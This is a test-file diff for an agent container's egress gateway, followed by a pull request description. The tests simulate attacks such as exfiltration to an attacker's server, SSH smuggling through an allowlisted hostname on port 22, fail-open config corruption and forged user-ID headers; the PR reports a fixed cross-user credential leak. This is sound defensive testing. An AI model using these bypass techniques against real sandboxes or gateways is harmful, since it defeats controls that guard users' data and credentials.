+        "notgithub.com",  # suffix without the dot boundary
+    ],
+)
+async def test_I1_connect_to_non_allowlisted_host_not_matched(
+    attacker_host: str,
+) -> None:
+    """Attacker: point an HTTP client / curl at their own server to exfil.
+    Defense: the gateway's egress.domain_rule reports no match for any host
+    outside the allowlist, so the aggregator (allow iff some rule matched)
+    blocks the CONNECT."""
+    check = make_egress_domain_check()
+    matched, findings = await check(_req(attacker_host, 443), _ALLOWLIST)
+    assert matched is False, (
+        f"attacker host {attacker_host!r} matched the allowlist — it would "
+        "be tunneled out; suffix-confusion / over-broad match bug"
+    )
+    assert findings == []
+
+
+# ---------------------------------------------------------------------------
+# I2. Port smuggling — allowlisted name, non-allowlisted port
+# ---------------------------------------------------------------------------
+
+
+async def test_I2_allowlisted_name_on_wrong_port_not_matched() -> None:
+    """Attacker: tunnel SSH (or any service) out via a host whose NAME is
+    allowlisted (``raw.github.com``) but on port 22, hoping a name-only
+    allowlist waves it through. Defense: ``ports`` scopes the rule, so a
+    match on the name alone is not enough — the gateway docstring calls
+    this exact bypass out ("how you accidentally whitelist the SSH service
+    for an attacker with a matching SNI")."""
+    check = make_egress_domain_check()
+
+    # 443 — the allowed port — DOES match (false-positive control).
+    ok_matched, _ = await check(_req("raw.github.com", 443), _ALLOWLIST)
+    assert ok_matched is True, "legitimate raw.github.com:443 must be allowed"
+
+    # 22 — outside ports=[443] — must NOT match even though the name does.
+    smuggled, _ = await check(_req("raw.github.com", 22), _ALLOWLIST)
+    assert smuggled is False, (
+        "raw.github.com:22 matched a ports=[443] rule — port scoping is "
+        "not enforced, SSH/arbitrary-service smuggling is possible"
+    )
+
+
+# ---------------------------------------------------------------------------
+# I3. Malformed rule config must fail closed
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "bad_config",
+    [
+        {},  # no domain_patterns
+        {"domains": ["*.github.com"]},  # wrong key (plural typo)
+        {"domain_patterns": []},  # empty — "match nothing", not "match all"
+        {"domain_patterns": ["*.github.com"], "extra": True},  # extra='forbid'
+        "*.github.com",  # not even a dict
+    ],
+)
+async def test_I3_malformed_config_fails_closed(bad_config: object) -> None:
+    """Attacker: corrupt an egress rule (via a REST typo or injection) hoping
+    the gateway fails OPEN and allows everything. Defense: the adapter
+    validates the config and on any failure reports no match — so a broken
+    rule blocks rather than allows. We probe with a host a CORRECT rule
+    would have allowed, to prove the broken config does not leak it."""
+    check = make_egress_domain_check()
+    matched, findings = await check(_req("raw.github.com", 443), bad_config)
+    assert matched is False, (
+        f"malformed config {bad_config!r} still matched raw.github.com — a "
+        "bad rule must fail closed, never accidentally allow egress"
+    )
+    assert findings == []
+
+
+# ---------------------------------------------------------------------------
+# I4. Empty host
+# ---------------------------------------------------------------------------
+
+
+async def test_I4_empty_host_not_matched() -> None:
+    """A blank host (truncated CONNECT line, parser edge) must not be treated
+    as a match — otherwise an attacker who can elicit an empty host string
+    gets a free allow."""
+    check = make_egress_domain_check()
+    matched, _ = await check(_req("", 443), _ALLOWLIST)
+    assert matched is False, "empty host must never count as an allowlist match"
+
+
+# ---------------------------------------------------------------------------
+# I5. DNS plane is fail-closed; a typo'd mode kills the gateway at boot
+# ---------------------------------------------------------------------------
+
+
+def test_I5_dns_default_mode_is_enforce_and_empty() -> None:
+    """The steady-state DNS posture is enforce + empty allowlist: a tripwire,
+    not a service. A default that resolved anything would be a silent
+    DNS-exfil channel."""
+    policy = GlobalDnsPolicy()
+    assert policy.mode == "enforce"
+    assert policy.patterns == ()
+    assert not policy.is_allowed("anything.example")
+
+
+def test_I5_dns_mode_typo_fails_loud_at_boot(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """Attacker-adjacent ops hazard: a typo'd ``EGRESS_DNS_MODE=observ`` must
+    NOT silently fall back to whichever mode the typo is not — it must kill
+    the gateway at boot. Fail-closed config, not fail-open."""
+    monkeypatch.setenv(MODE_ENV, "observ")  # typo of "observe"
+    monkeypatch.setenv(ALLOWLIST_ENV, "")
+    with pytest.raises(ValueError):
+        GlobalDnsPolicy.from_env()


### PR DESCRIPTION
Brings the attack-simulation suite and its matrix back in sync with the shipped egress control / K8s runtime / post-approval-removal code, and — while writing the identity-isolation tests — found and fixed a real cross-user credential leak in the MCP credential proxy.

## 🔒 Security fix (`b6d9198`)

`/mcp-proxy` selected the per-user OIDC token from the **`X-RoleMesh-User-Id` request header** and looked it up in the shared token vault. A half-trusted container (holding its own valid egress token) could set that header to **any** user id and be handed **another user's (cross-user / cross-tenant) OIDC access token**. The existing `pop()` only stopped the header *leaking upstream* — after it had already chosen the credential.

A white-box test reproduced it deterministically (`Bearer token-B` injected for a forged `X-RoleMesh-User-Id: userB` on a `userA` token), then the fix made it green:

```diff
-        user_id = request.headers.get(_USER_ID_HEADER)
+        user_id = identity.user_id if identity is not None else None   # verified token, not the header
+        # mismatching header is logged as an anomaly, then ignored
```

The **provider (LLM) path was already correct** — it keys on `identity.tenant_id` — and is now pinned by a control test. The promptfoo black-box run cannot reach this path (`redteam/seed.py` pins `auth_mode="service"`), which is exactly why coverage is a deterministic white-box test.

> Net production change: **+14 / −1** in `reverse_proxy.py` (one logic line; the rest is a comment + an anomaly-log).

## 🧪 Attack-sim suite refresh (`67ccac5`)

Corrections (matrix/docs contradicted merged code):
- **D4**: dropped the stale "egress not implemented" strict-xfail (it referenced a deleted `tmp.txt` scratch). EC-2 shipped → D4 is now a real passing test driving `GlobalDnsPolicy`.
- **docs/17 (+ -cn)**: fixed the E section (dead test refs + the removed `_tenant_matches` symbol), corrected the D4 row (DNS is a **platform** policy, not per-tenant), dropped the dangling **F6** documented-limitation (approval subsystem is gone), refreshed the count table.
- **README** + `verify-hardening.sh`: fixed wrong xfail test names and the "not implemented" DNS claim.

New coverage (features that landed without an attack-sim category):
- `test_E_tenant_isolation.py` — restore E1/E2 (lost as collateral with the approval-subsystem removal) against the live `SafetyRpcServer` authoritative-tenant guard; **E6** documents the consistent-forge / NATS-account-per-tenant gap as a strict xfail.
- `test_E_identity_isolation.py` — **E7** (the fix above) + provider control.
- `test_I_egress_gateway.py` — network-egress category via the real gateway seams (`make_egress_domain_check`, `GlobalDnsPolicy`).
- `test_A_container_escape_k8s_spec.py` — the A-series hardening contract on the K8s pod `securityContext`.

## ✅ Verification

- `tests/attack_sim/`: **62 passed, 16 skipped** (`[safety-ml]` not installed), **2 xfailed** (B2 credential-proxy enumeration, E6 NATS-ACL gap).
- `tests/egress/` unit suite: **197 passed** — no regression from the fix.
- ruff clean; no non-English content in code files.

## Notes for reviewers
- Please eyeball the `reverse_proxy.py` diff: `identity.user_id` is the authenticated copy of the same value the agent_runner puts in the header (confirmed at the mint site `container_executor.py`), so the fix is semantically a no-op in the happy path and strictly safer under forgery — but worth a second pair of eyes on any delegation/sub-agent semantics.
- `tests/attack_sim/` is path-ignored in CI by design (it's a local/manual per-PR gate); the new tests are Docker-free and DB-free so they run anywhere in <1s each.

🤖 Generated with [Claude Code](https://claude.com/claude-code)